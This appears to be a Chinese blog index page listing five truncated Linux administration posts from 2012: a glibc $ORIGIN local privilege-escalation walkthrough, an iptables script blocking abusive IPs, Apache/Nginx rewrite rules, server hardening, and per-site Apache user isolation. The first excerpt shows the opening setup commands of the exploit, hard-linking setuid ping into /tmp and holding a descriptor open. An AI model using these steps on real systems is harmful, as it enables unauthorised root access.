GNU glibc动态连接器$ORIGIN本地权限提升漏洞

2012-1-16 王健宇 Linux

root下添加一个testuser1帐户
设置密码
su testuser1
cd ~
mkdir -p /tmp/ex1
ln /bin/ping /tmp/ex1/target
exec 3< /tmp/ex1/target
rm -rf /tmp/ex1
再执行
ls -l /proc/$$/fd/3
显示
lr-x------ 1 testuser1 testuser1 64 Dec ...

阅读全文>>

标签: glibc2提权

评论(0) 浏览(2611)

shell结合iptables自动处理攻击

2012-1-16 王健宇 Linux

#!/bin/sh
cd /usr/local/nginx/logs
tail access.log -n 1000 |grep vote.php |awk {'print $2'} |sort |uniq -c |sort -nr |awk '{if ($2!=null && $1>50) {print $2}}' > drop_ip.txt
fo...

阅读全文>>

标签: iptables自动处理攻击

评论(0) 浏览(2209)

Nginx apache rewrite 对比

2012-1-16 王健宇 Linux

[APACHE]
RewriteRule ^mergenotify-([0-9]+).html$ index.php?app=mergenotify&order_id=$1 [L]
 
[Nginx]
rewrite ^/mergenotify-([0-9]+).html$ /index.php?app=mergenotify&order_id=$1 last;

 

阅读全文>>

评论(0) 浏览(2986)

Linux 服务器安全配置

2012-1-16 王健宇 Linux

Linux 服务器安全配置
--------------------------------------------------------------------------------
第一部分:RedHat Linux篇
1.概述
Linux服务器版本:RedHat Linux AS
对于开放式的操作系统---Linux,系统的安全设定包括系统服务最小化、限制远程存取、隐藏重要资料、修补安...

阅读全文>>

标签: Linux服务器安全配置

评论(0) 浏览(3057)

Apache多站点分用户权限设置

2012-1-16 王健宇 Linux

分享下apache的每个站单独分配一个用户,先假设下,系统 /data 目录下 有www.abc.comwww.bbs.com ,要实现的目的就是比如www.abc.com被入侵,入侵者看不到并且修改不了www.bbs.com站内的文件。www.abc.om 用abc用户,www.bbs.com用bbs用户。

apache装完都有www-data用户www-data用户组,所以网站都是以这个用户...

阅读全文>>

标签: Apache安全用户权限设置

评论(0) 浏览(2694)

Powered by emlog sitemap